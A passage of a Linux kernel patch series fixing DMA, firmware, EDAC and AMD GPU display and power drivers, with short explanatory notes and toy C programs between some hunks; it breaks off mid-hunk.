+--- a/drivers/dma/at_xdmac.c
++++ b/drivers/dma/at_xdmac.c
+@@ -243,6 +243,7 @@ struct at_xdmac {
+ 	int			irq;
+ 	struct clk		*clk;
+ 	u32			save_gim;
++	u32			save_gs;
+ 	struct dma_pool		*at_xdmac_desc_pool;
+ 	const struct at_xdmac_layout	*layout;
+ 	struct at_xdmac_chan	chan[];
+@@ -1988,6 +1989,7 @@ static int __maybe_unused atmel_xdmac_suspend(struct device *dev)
+ 		}
+ 	}
+ 	atxdmac->save_gim = at_xdmac_read(atxdmac, AT_XDMAC_GIM);
++	atxdmac->save_gs = at_xdmac_read(atxdmac, AT_XDMAC_GS);
+ 
+ 	at_xdmac_off(atxdmac);
+ 	clk_disable_unprepare(atxdmac->clk);
+@@ -2027,7 +2029,8 @@ static int __maybe_unused atmel_xdmac_resume(struct device *dev)
+ 			at_xdmac_chan_write(atchan, AT_XDMAC_CNDC, atchan->save_cndc);
+ 			at_xdmac_chan_write(atchan, AT_XDMAC_CIE, atchan->save_cim);
+ 			wmb();
+-			at_xdmac_write(atxdmac, AT_XDMAC_GE, atchan->mask);
++			if (atxdmac->save_gs & atchan->mask)
++				at_xdmac_write(atxdmac, AT_XDMAC_GE, atchan->mask);
+ 		}
+ 	}
+ 	return 0;
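The at_xdmac fix snapshots the global channel status (GS) at suspend and, on resume, re-enables only the channels whose bit was set, instead of unconditionally re-enabling everything. A toy version of that save/restore, with fake registers standing in for the MMIO reads:

#include <stdio.h>

static unsigned int hw_status = 0x5;	/* pretend channels 0 and 2 were running */
static unsigned int hw_enable;

int main(void)
{
	unsigned int save_gs, ch;

	save_gs = hw_status;		/* suspend: snapshot AT_XDMAC_GS */
	hw_status = 0;			/* controller loses state */

	for (ch = 0; ch < 4; ch++) {	/* resume path */
		unsigned int mask = 1u << ch;

		if (save_gs & mask)	/* the fix: consult the snapshot */
			hw_enable |= mask;
	}
	printf("re-enabled mask: 0x%x\n", hw_enable);	/* prints 0x5 */
	return 0;
}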
+diff --git a/drivers/dma/dw-edma/dw-edma-core.c b/drivers/dma/dw-edma/dw-edma-core.c
+index 52bdf04aff511..ef4cdcf6beba0 100644
+--- a/drivers/dma/dw-edma/dw-edma-core.c
++++ b/drivers/dma/dw-edma/dw-edma-core.c
+@@ -170,7 +170,7 @@ static void vchan_free_desc(struct virt_dma_desc *vdesc)
+ 	dw_edma_free_desc(vd2dw_edma_desc(vdesc));
+ }
+ 
+-static void dw_edma_start_transfer(struct dw_edma_chan *chan)
++static int dw_edma_start_transfer(struct dw_edma_chan *chan)
+ {
+ 	struct dw_edma_chunk *child;
+ 	struct dw_edma_desc *desc;
+@@ -178,16 +178,16 @@ static void dw_edma_start_transfer(struct dw_edma_chan *chan)
+ 
+ 	vd = vchan_next_desc(&chan->vc);
+ 	if (!vd)
+-		return;
++		return 0;
+ 
+ 	desc = vd2dw_edma_desc(vd);
+ 	if (!desc)
+-		return;
++		return 0;
+ 
+ 	child = list_first_entry_or_null(&desc->chunk->list,
+ 					 struct dw_edma_chunk, list);
+ 	if (!child)
+-		return;
++		return 0;
+ 
+ 	dw_edma_v0_core_start(child, !desc->xfer_sz);
+ 	desc->xfer_sz += child->ll_region.sz;
+@@ -195,6 +195,8 @@ static void dw_edma_start_transfer(struct dw_edma_chan *chan)
+ 	list_del(&child->list);
+ 	kfree(child);
+ 	desc->chunks_alloc--;
++
++	return 1;
+ }
+ 
+ static int dw_edma_device_config(struct dma_chan *dchan,
+@@ -277,9 +279,12 @@ static void dw_edma_device_issue_pending(struct dma_chan *dchan)
+ 	struct dw_edma_chan *chan = dchan2dw_edma_chan(dchan);
+ 	unsigned long flags;
+ 
++	if (!chan->configured)
++		return;
++
+ 	spin_lock_irqsave(&chan->vc.lock, flags);
+-	if (chan->configured && chan->request == EDMA_REQ_NONE &&
+-	    chan->status == EDMA_ST_IDLE && vchan_issue_pending(&chan->vc)) {
++	if (vchan_issue_pending(&chan->vc) && chan->request == EDMA_REQ_NONE &&
++	    chan->status == EDMA_ST_IDLE) {
+ 		chan->status = EDMA_ST_BUSY;
+ 		dw_edma_start_transfer(chan);
+ 	}
+@@ -572,14 +577,14 @@ static void dw_edma_done_interrupt(struct dw_edma_chan *chan)
+ 		switch (chan->request) {
+ 		case EDMA_REQ_NONE:
+ 			desc = vd2dw_edma_desc(vd);
+-			if (desc->chunks_alloc) {
+-				chan->status = EDMA_ST_BUSY;
+-				dw_edma_start_transfer(chan);
+-			} else {
++			if (!desc->chunks_alloc) {
+ 				list_del(&vd->node);
+ 				vchan_cookie_complete(vd);
+-				chan->status = EDMA_ST_IDLE;
+ 			}
++
++			/* Continue transferring if there are remaining chunks or issued requests. */
++			chan->status = dw_edma_start_transfer(chan) ? EDMA_ST_BUSY : EDMA_ST_IDLE;
+ 			break;
+ 
+ 		case EDMA_REQ_STOP:
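With dw_edma_start_transfer() now reporting whether it actually launched another chunk, the completion handler can derive the BUSY/IDLE state from a single expression instead of tracking it by hand. A toy queue showing the shape of that pattern (illustrative only, no real descriptors or locking):

#include <stdio.h>

enum st { ST_IDLE, ST_BUSY };

static int pending = 2;	/* chunks left to transfer */

static int start_transfer(void)
{
	if (!pending)
		return 0;	/* nothing left to launch */
	pending--;		/* hardware kicked for one chunk */
	return 1;
}

int main(void)
{
	enum st state = ST_BUSY;

	/* Completion interrupt: keep going while chunks remain. */
	while (state == ST_BUSY)
		state = start_transfer() ? ST_BUSY : ST_IDLE;
	printf("pending=%d state=%s\n", pending,
	       state == ST_IDLE ? "IDLE" : "BUSY");
	return 0;
}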
+diff --git a/drivers/dma/mv_xor_v2.c b/drivers/dma/mv_xor_v2.c
+index 113834e1167b6..d086ff1824f82 100644
+--- a/drivers/dma/mv_xor_v2.c
++++ b/drivers/dma/mv_xor_v2.c
+@@ -755,7 +755,7 @@ static int mv_xor_v2_probe(struct platform_device *pdev)
+ 
+ 	xor_dev->clk = devm_clk_get(&pdev->dev, NULL);
+ 	if (PTR_ERR(xor_dev->clk) == -EPROBE_DEFER) {
+-		ret = EPROBE_DEFER;
++		ret = -EPROBE_DEFER;
+ 		goto disable_reg_clk;
+ 	}
+ 	if (!IS_ERR(xor_dev->clk)) {
+diff --git a/drivers/dma/qcom/gpi.c b/drivers/dma/qcom/gpi.c
+index 59a36cbf9b5f7..932628b319c81 100644
+--- a/drivers/dma/qcom/gpi.c
++++ b/drivers/dma/qcom/gpi.c
+@@ -1966,7 +1966,6 @@ error_alloc_ev_ring:
+ error_config_int:
+ 	gpi_free_ring(&gpii->ev_ring, gpii);
+ exit_gpi_init:
+-	mutex_unlock(&gpii->ctrl_lock);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/edac/skx_base.c b/drivers/edac/skx_base.c
+index 9397abb42c498..0a862336a7ce8 100644
+--- a/drivers/edac/skx_base.c
++++ b/drivers/edac/skx_base.c
+@@ -510,7 +510,7 @@ rir_found:
+ }
+ 
+ static u8 skx_close_row[] = {
+-	15, 16, 17, 18, 20, 21, 22, 28, 10, 11, 12, 13, 29, 30, 31, 32, 33
++	15, 16, 17, 18, 20, 21, 22, 28, 10, 11, 12, 13, 29, 30, 31, 32, 33, 34
+ };
+ 
+ static u8 skx_close_column[] = {
+@@ -518,7 +518,7 @@ static u8 skx_close_column[] = {
+ };
+ 
+ static u8 skx_open_row[] = {
+-	14, 15, 16, 20, 28, 21, 22, 23, 24, 25, 26, 27, 29, 30, 31, 32, 33
++	14, 15, 16, 20, 28, 21, 22, 23, 24, 25, 26, 27, 29, 30, 31, 32, 33, 34
+ };
+ 
+ static u8 skx_open_column[] = {
+diff --git a/drivers/firmware/arm_scmi/driver.c b/drivers/firmware/arm_scmi/driver.c
+index ffdad59ec81fc..fe06dc1936896 100644
+--- a/drivers/firmware/arm_scmi/driver.c
++++ b/drivers/firmware/arm_scmi/driver.c
+@@ -1981,7 +1981,7 @@ static int scmi_xfer_info_init(struct scmi_info *sinfo)
+ 		return ret;
+ 
+ 	ret = __scmi_xfer_info_init(sinfo, &sinfo->tx_minfo);
+-	if (!ret && idr_find(&sinfo->rx_idr, SCMI_PROTOCOL_BASE))
++	if (!ret && !idr_is_empty(&sinfo->rx_idr))
+ 		ret = __scmi_xfer_info_init(sinfo, &sinfo->rx_minfo);
+ 
+ 	return ret;
+diff --git a/drivers/firmware/qcom_scm.c b/drivers/firmware/qcom_scm.c
+index cdbfe54c81467..51eb85354c058 100644
+--- a/drivers/firmware/qcom_scm.c
++++ b/drivers/firmware/qcom_scm.c
+@@ -1418,8 +1418,7 @@ static int qcom_scm_probe(struct platform_device *pdev)
+ static void qcom_scm_shutdown(struct platform_device *pdev)
+ {
+ 	/* Clean shutdown, disable download mode to allow normal restart */
+-	if (download_mode)
+-		qcom_scm_set_download_mode(false);
++	qcom_scm_set_download_mode(false);
+ }
+ 
+ static const struct of_device_id qcom_scm_dt_match[] = {
+diff --git a/drivers/firmware/stratix10-svc.c b/drivers/firmware/stratix10-svc.c
+index bde1f543f5298..80f4e2d14e046 100644
+--- a/drivers/firmware/stratix10-svc.c
++++ b/drivers/firmware/stratix10-svc.c
+@@ -1133,8 +1133,8 @@ static int stratix10_svc_drv_probe(struct platform_device *pdev)
+ 		return ret;
+ 
+ 	genpool = svc_create_memory_pool(pdev, sh_memory);
+-	if (!genpool)
+-		return -ENOMEM;
++	if (IS_ERR(genpool))
++		return PTR_ERR(genpool);
+ 
+ 	/* allocate service controller and supporting channel */
+ 	controller = devm_kzalloc(dev, sizeof(*controller), GFP_KERNEL);
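The stratix10 fix matters because svc_create_memory_pool() reports failure as an error-encoded pointer, not as NULL; a NULL check never fires. Sketch of the ERR_PTR convention with a minimal userspace shim, for illustration only (the real helpers live in linux/err.h):

#include <errno.h>
#include <stdio.h>

#define MAX_ERRNO 4095

static inline void *ERR_PTR(long err) { return (void *)err; }
static inline long PTR_ERR(const void *p) { return (long)p; }
static inline int IS_ERR(const void *p)
{
	return (unsigned long)p >= (unsigned long)-MAX_ERRNO;
}

static void *create_pool(int fail)
{
	/* 0x1000 is a fake opaque handle, never dereferenced here. */
	return fail ? ERR_PTR(-ENOMEM) : (void *)0x1000;
}

int main(void)
{
	void *pool = create_pool(1);

	if (IS_ERR(pool))	/* a NULL check would miss this error */
		printf("pool failed: %ld\n", PTR_ERR(pool));
	return 0;
}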
+diff --git a/drivers/fpga/fpga-bridge.c b/drivers/fpga/fpga-bridge.c
+index 13918c8c839ea..833ce13ff6f86 100644
+--- a/drivers/fpga/fpga-bridge.c
++++ b/drivers/fpga/fpga-bridge.c
+@@ -115,7 +115,7 @@ static int fpga_bridge_dev_match(struct device *dev, const void *data)
+ /**
+  * fpga_bridge_get - get an exclusive reference to an fpga bridge
+  * @dev:	parent device that fpga bridge was registered with
+- * @info:	fpga manager info
++ * @info:	fpga image specific information
+  *
+  * Given a device, get an exclusive reference to an fpga bridge.
+  *
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 3dac1e139c5f3..533263d442657 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -35,6 +35,7 @@
+ #include <linux/devcoredump.h>
+ #include <generated/utsrelease.h>
+ #include <linux/pci-p2pdma.h>
++#include <linux/apple-gmux.h>
+ 
+ #include <drm/drm_aperture.h>
+ #include <drm/drm_atomic_helper.h>
+@@ -3952,12 +3953,15 @@ fence_driver_init:
+ 	if ((adev->pdev->class >> 8) == PCI_CLASS_DISPLAY_VGA)
+ 		vga_client_register(adev->pdev, amdgpu_device_vga_set_decode);
+ 
+-	if (amdgpu_device_supports_px(ddev)) {
+-		px = true;
++	px = amdgpu_device_supports_px(ddev);
++
++	if (px || (!pci_is_thunderbolt_attached(adev->pdev) &&
++				apple_gmux_detect(NULL, NULL)))
+ 		vga_switcheroo_register_client(adev->pdev,
+ 					       &amdgpu_switcheroo_ops, px);
++
++	if (px)
+ 		vga_switcheroo_init_domain_pm_ops(adev->dev, &adev->vga_pm_domain);
+-	}
+ 
+ 	if (adev->gmc.xgmi.pending_reset)
+ 		queue_delayed_work(system_wq, &mgpu_info.delayed_reset_work,
+@@ -4063,6 +4067,7 @@ void amdgpu_device_fini_hw(struct amdgpu_device *adev)
+ void amdgpu_device_fini_sw(struct amdgpu_device *adev)
+ {
+ 	int idx;
++	bool px;
+ 
+ 	amdgpu_fence_driver_sw_fini(adev);
+ 	amdgpu_device_ip_fini(adev);
+@@ -4082,10 +4087,16 @@ void amdgpu_device_fini_sw(struct amdgpu_device *adev)
+ 
+ 	kfree(adev->bios);
+ 	adev->bios = NULL;
+-	if (amdgpu_device_supports_px(adev_to_drm(adev))) {
++
++	px = amdgpu_device_supports_px(adev_to_drm(adev));
++
++	if (px || (!pci_is_thunderbolt_attached(adev->pdev) &&
++				apple_gmux_detect(NULL, NULL)))
+ 		vga_switcheroo_unregister_client(adev->pdev);
++
++	if (px)
+ 		vga_switcheroo_fini_domain_pm_ops(adev->dev);
+-	}
++
+ 	if ((adev->pdev->class >> 8) == PCI_CLASS_DISPLAY_VGA)
+ 		vga_client_unregister(adev->pdev);
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 7fa1728384bfd..422909d1f352b 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -1771,7 +1771,8 @@ static void amdgpu_dm_fini(struct amdgpu_device *adev)
+ 		dc_deinit_callbacks(adev->dm.dc);
+ #endif
+ 
+-	dc_dmub_srv_destroy(&adev->dm.dc->ctx->dmub_srv);
++	if (adev->dm.dc)
++		dc_dmub_srv_destroy(&adev->dm.dc->ctx->dmub_srv);
+ 
+ 	if (dc_enable_dmub_notifications(adev->dm.dc)) {
+ 		kfree(adev->dm.dmub_notify);
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c
+index 26291db0a3cf6..872d06fe14364 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c
+@@ -122,6 +122,9 @@ bool amdgpu_dm_link_setup_psr(struct dc_stream_state *stream)
+ 		psr_config.allow_multi_disp_optimizations =
+ 			(amdgpu_dc_feature_mask & DC_PSR_ALLOW_MULTI_DISP_OPT);
+ 
++		if (!psr_su_set_y_granularity(dc, link, stream, &psr_config))
++			return false;
++
+ 		ret = dc_link_setup_psr(link, stream, &psr_config, &psr_context);
+ 
+ 	}
+diff --git a/drivers/gpu/drm/amd/display/dc/dce60/Makefile b/drivers/gpu/drm/amd/display/dc/dce60/Makefile
+index dda596fa1cd76..fee331accc0e7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dce60/Makefile
++++ b/drivers/gpu/drm/amd/display/dc/dce60/Makefile
+@@ -23,7 +23,7 @@
+ # Makefile for the 'controller' sub-component of DAL.
+ # It provides the control and status of HW CRTC block.
+ 
+-CFLAGS_AMDDALPATH)/dc/dce60/dce60_resource.o = $(call cc-disable-warning, override-init)
++CFLAGS_$(AMDDALPATH)/dc/dce60/dce60_resource.o = $(call cc-disable-warning, override-init)
+ 
+ DCE60 = dce60_timing_generator.o dce60_hw_sequencer.o \
+ 	dce60_resource.o
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c
+index c18c52a60100e..c4e206aedf731 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c
+@@ -1648,7 +1648,8 @@ noinline bool dcn30_internal_validate_bw(
+ 		display_e2e_pipe_params_st *pipes,
+ 		int *pipe_cnt_out,
+ 		int *vlevel_out,
+-		bool fast_validate)
++		bool fast_validate,
++		bool allow_self_refresh_only)
+ {
+ 	bool out = false;
+ 	bool repopulate_pipes = false;
+@@ -1675,7 +1676,7 @@ noinline bool dcn30_internal_validate_bw(
+ 
+ 	dml_log_pipe_params(&context->bw_ctx.dml, pipes, pipe_cnt);
+ 
+-	if (!fast_validate) {
++	if (!fast_validate || !allow_self_refresh_only) {
+ 		/*
+ 		 * DML favors voltage over p-state, but we're more interested in
+ 		 * supporting p-state over voltage. We can't support p-state in
+@@ -1688,11 +1689,12 @@ noinline bool dcn30_internal_validate_bw(
+ 		if (vlevel < context->bw_ctx.dml.soc.num_states)
+ 			vlevel = dcn20_validate_apply_pipe_split_flags(dc, context, vlevel, split, merge);
+ 	}
+-	if (fast_validate || vlevel == context->bw_ctx.dml.soc.num_states ||
+-			vba->DRAMClockChangeSupport[vlevel][vba->maxMpcComb] == dm_dram_clock_change_unsupported) {
++	if (allow_self_refresh_only &&
++	    (fast_validate || vlevel == context->bw_ctx.dml.soc.num_states ||
++			vba->DRAMClockChangeSupport[vlevel][vba->maxMpcComb] == dm_dram_clock_change_unsupported)) {
+ 		/*
+-		 * If mode is unsupported or there's still no p-state support then
+-		 * fall back to favoring voltage.
++		 * If mode is unsupported or there's still no p-state support
++		 * then fall back to favoring voltage.
+ 		 *
+ 		 * We don't actually support prefetch mode 2, so require that we
+ 		 * at least support prefetch mode 1.
+@@ -2063,7 +2065,7 @@ bool dcn30_validate_bandwidth(struct dc *dc,
+ 	BW_VAL_TRACE_COUNT();
+ 
+ 	DC_FP_START();
+-	out = dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, fast_validate);
++	out = dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, fast_validate, true);
+ 	DC_FP_END();
+ 
+ 	if (pipe_cnt == 0)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.h b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.h
+index 7d063c7d6a4bf..8e6b8b7368fdb 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.h
+@@ -64,7 +64,8 @@ bool dcn30_internal_validate_bw(
+ 		display_e2e_pipe_params_st *pipes,
+ 		int *pipe_cnt_out,
+ 		int *vlevel_out,
+-		bool fast_validate);
++		bool fast_validate,
++		bool allow_self_refresh_only);
+ void dcn30_calculate_wm_and_dlg(
+ 		struct dc *dc, struct dc_state *context,
+ 		display_e2e_pipe_params_st *pipes,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c
+index 3ca517dcc82dc..d3918a10773a3 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c
+@@ -1795,7 +1795,7 @@ bool dcn31_validate_bandwidth(struct dc *dc,
+ 	BW_VAL_TRACE_COUNT();
+ 
+ 	DC_FP_START();
+-	out = dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, fast_validate);
++	out = dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, fast_validate, true);
+ 	DC_FP_END();
+ 
+ 	// Disable fast_validate to set min dcfclk in calculate_wm_and_dlg
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+index 73f519dbdb531..9ffba4c6fe550 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+@@ -1697,6 +1697,81 @@ static void dcn314_get_panel_config_defaults(struct dc_panel_config *panel_confi
+ 	*panel_config = panel_config_defaults;
+ }
+ 
++static bool filter_modes_for_single_channel_workaround(struct dc *dc,
++		struct dc_state *context)
++{
++	// Filter out timing combinations at or above 2K@240Hz + 8K@24fps when memory is a single-channel LPDDR DIMM
++	if (dc->clk_mgr->bw_params->vram_type == 34 && dc->clk_mgr->bw_params->num_channels < 2) {
++		int total_phy_pix_clk = 0;
++
++		for (int i = 0; i < context->stream_count; i++)
++			if (context->res_ctx.pipe_ctx[i].stream)
++				total_phy_pix_clk += context->res_ctx.pipe_ctx[i].stream->phy_pix_clk;
++
++		if (total_phy_pix_clk >= (1148928 + 826260)) // 2K@240Hz + 8K@24fps
++			return true;
++	}
++	return false;
++}
++
++bool dcn314_validate_bandwidth(struct dc *dc,
++		struct dc_state *context,
++		bool fast_validate)
++{
++	bool out = false;
++
++	BW_VAL_TRACE_SETUP();
++
++	int vlevel = 0;
++	int pipe_cnt = 0;
++	display_e2e_pipe_params_st *pipes = kzalloc(dc->res_pool->pipe_count * sizeof(display_e2e_pipe_params_st), GFP_KERNEL);
++	DC_LOGGER_INIT(dc->ctx->logger);
++
++	BW_VAL_TRACE_COUNT();
++
++	if (filter_modes_for_single_channel_workaround(dc, context))
++		goto validate_fail;
++
++	DC_FP_START();
++	// do not support self refresh only
++	out = dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, fast_validate, false);
++	DC_FP_END();
++
++	// Disable fast_validate to set min dcfclk in calculate_wm_and_dlg
++	if (pipe_cnt == 0)
++		fast_validate = false;
++
++	if (!out)
++		goto validate_fail;
++
++	BW_VAL_TRACE_END_VOLTAGE_LEVEL();
++
++	if (fast_validate) {
++		BW_VAL_TRACE_SKIP(fast);
++		goto validate_out;
++	}
++
++	dc->res_pool->funcs->calculate_wm_and_dlg(dc, context, pipes, pipe_cnt, vlevel);
++
++	BW_VAL_TRACE_END_WATERMARKS();
++
++	goto validate_out;
++
++validate_fail:
++	DC_LOG_WARNING("Mode Validation Warning: %s failed validation.\n",
++		dml_get_status_message(context->bw_ctx.dml.vba.ValidationStatus[context->bw_ctx.dml.vba.soc.num_states]));
++
++	BW_VAL_TRACE_SKIP(fail);
++	out = false;
++
++validate_out:
++	kfree(pipes);
++
++	BW_VAL_TRACE_FINISH();
++
++	return out;
++}
++
+ static struct resource_funcs dcn314_res_pool_funcs = {
+ 	.destroy = dcn314_destroy_resource_pool,
+ 	.link_enc_create = dcn31_link_encoder_create,
+@@ -1704,7 +1779,7 @@ static struct resource_funcs dcn314_res_pool_funcs = {
+ 	.link_encs_assign = link_enc_cfg_link_encs_assign,
+ 	.link_enc_unassign = link_enc_cfg_link_enc_unassign,
+ 	.panel_cntl_create = dcn31_panel_cntl_create,
+-	.validate_bandwidth = dcn31_validate_bandwidth,
++	.validate_bandwidth = dcn314_validate_bandwidth,
+ 	.calculate_wm_and_dlg = dcn31_calculate_wm_and_dlg,
+ 	.update_soc_for_wm_a = dcn31_update_soc_for_wm_a,
+ 	.populate_dml_pipes = dcn314_populate_dml_pipes_from_context,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.h b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.h
+index 0dd3153aa5c17..49ffe71018dfb 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.h
+@@ -39,6 +39,10 @@ struct dcn314_resource_pool {
+ 	struct resource_pool base;
+ };
+ 
++bool dcn314_validate_bandwidth(struct dc *dc,
++		struct dc_state *context,
++		bool fast_validate);
++
+ struct resource_pool *dcn314_create_resource_pool(
+ 		const struct dc_init_data *init_data,
+ 		struct dc *dc);
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
+index d4c0f9cdac8e2..4fa6363647937 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
+@@ -634,7 +634,7 @@ int dcn30_find_dummy_latency_index_for_fw_based_mclk_switch(struct dc *dc,
+ 	while (dummy_latency_index < max_latency_table_entries) {
+ 		context->bw_ctx.dml.soc.dram_clock_change_latency_us =
+ 				dc->clk_mgr->bw_params->dummy_pstate_table[dummy_latency_index].dummy_pstate_latency_us;
+-		dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, false);
++		dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, false, true);
+ 
+ 		if (context->bw_ctx.dml.soc.allow_dram_self_refresh_or_dram_clock_change_in_vblank ==
+ 			dm_allow_self_refresh_and_mclk_switch)
+diff --git a/drivers/gpu/drm/amd/display/modules/power/power_helpers.c b/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
+index 9b5d9b2c9a6a7..e75b443ee95dc 100644
+--- a/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
++++ b/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
+@@ -916,3 +916,38 @@ bool mod_power_only_edp(const struct dc_state *context, const struct dc_stream_s
+ {
+ 	return context && context->stream_count == 1 && dc_is_embedded_signal(stream->signal);
+ }
++
++bool psr_su_set_y_granularity(struct dc *dc, struct dc_link *link,
++			      struct dc_stream_state *stream,
++			      struct psr_config *config)
++{
++	uint16_t pic_height;
++	uint8_t slice_height;
++
++	if ((link->connector_signal & SIGNAL_TYPE_EDP) &&
++	    (!dc->caps.edp_dsc_support ||
++	    link->panel_config.dsc.disable_dsc_edp ||
++	    !link->dpcd_caps.dsc_caps.dsc_basic_caps.fields.dsc_support.DSC_SUPPORT ||
++	    !stream->timing.dsc_cfg.num_slices_v))
++		return true;
++
++	pic_height = stream->timing.v_addressable +
++		stream->timing.v_border_top + stream->timing.v_border_bottom;
++
++	if (stream->timing.dsc_cfg.num_slices_v == 0)
++		return false;
++
++	slice_height = pic_height / stream->timing.dsc_cfg.num_slices_v;
++
++	if (slice_height) {
++		if (config->su_y_granularity &&
++		    (slice_height % config->su_y_granularity)) {
++			ASSERT(0);
++			return false;
++		}
++
++		config->su_y_granularity = slice_height;
++	}
++
++	return true;
++}
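The helper derives the PSR-SU Y granularity from the DSC slice height (picture height divided by the vertical slice count) and rejects configurations where the slice height is not a multiple of the panel's required granularity. A stand-alone model of that check; the numbers are made up for illustration, the real code pulls them from the DSC and panel capabilities and also skips the check entirely when DSC is inactive:

#include <stdio.h>

static int set_y_granularity(unsigned int pic_height,
			     unsigned int num_slices_v,
			     unsigned int *su_y_granularity)
{
	unsigned int slice_height;

	if (!num_slices_v)	/* avoid divide-by-zero, as the fix does */
		return 0;

	slice_height = pic_height / num_slices_v;
	if (*su_y_granularity && (slice_height % *su_y_granularity))
		return 0;	/* incompatible with panel requirement */

	*su_y_granularity = slice_height;
	return 1;
}

int main(void)
{
	unsigned int gran = 4;

	/* 2160-line picture in 8 DSC slices -> 270-line slices.
	   270 % 4 != 0, so this combination is rejected. */
	printf("ok=%d gran=%u\n", set_y_granularity(2160, 8, &gran), gran);
	return 0;
}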
+diff --git a/drivers/gpu/drm/amd/display/modules/power/power_helpers.h b/drivers/gpu/drm/amd/display/modules/power/power_helpers.h
+index 316452e9dbc91..bb16b37b83da7 100644
+--- a/drivers/gpu/drm/amd/display/modules/power/power_helpers.h
++++ b/drivers/gpu/drm/amd/display/modules/power/power_helpers.h
+@@ -59,4 +59,7 @@ void mod_power_calc_psr_configs(struct psr_config *psr_config,
+ 		const struct dc_stream_state *stream);
+ bool mod_power_only_edp(const struct dc_state *context,
+ 		const struct dc_stream_state *stream);
++bool psr_su_set_y_granularity(struct dc *dc, struct dc_link *link,
++			      struct dc_stream_state *stream,
++			      struct psr_config *config);
+ #endif /* MODULES_POWER_POWER_HELPERS_H_ */
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index 6ab1550235926..516e07c367f00 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -161,10 +161,15 @@ int smu_get_dpm_freq_range(struct smu_context *smu,
+ 
+ int smu_set_gfx_power_up_by_imu(struct smu_context *smu)
+ {
+-	if (!smu->ppt_funcs || !smu->ppt_funcs->set_gfx_power_up_by_imu)
+-		return -EOPNOTSUPP;
++	int ret = 0;
++	struct amdgpu_device *adev = smu->adev;
+ 
+-	return smu->ppt_funcs->set_gfx_power_up_by_imu(smu);
++	if (smu->ppt_funcs->set_gfx_power_up_by_imu) {
++		ret = smu->ppt_funcs->set_gfx_power_up_by_imu(smu);
++		if (ret)
++			dev_err(adev->dev, "Failed to enable gfx imu!\n");
++	}
++	return ret;
+ }
+ 
+ static u32 smu_get_mclk(void *handle, bool low)
+@@ -195,6 +200,19 @@ static u32 smu_get_sclk(void *handle, bool low)
+ 	return clk_freq * 100;
+ }
+ 
++static int smu_set_gfx_imu_enable(struct smu_context *smu)
++{
++	struct amdgpu_device *adev = smu->adev;
++
++	if (adev->firmware.load_type != AMDGPU_FW_LOAD_PSP)
++		return 0;
++
++	if (amdgpu_in_reset(smu->adev) || adev->in_s0ix)
++		return 0;
++
++	return smu_set_gfx_power_up_by_imu(smu);
++}
++
+ static int smu_dpm_set_vcn_enable(struct smu_context *smu,
+ 				  bool enable)
+ {
+@@ -1386,15 +1404,9 @@ static int smu_hw_init(void *handle)
+ 	}
+ 
+ 	if (smu->is_apu) {
+-		if ((smu->ppt_funcs->set_gfx_power_up_by_imu) &&
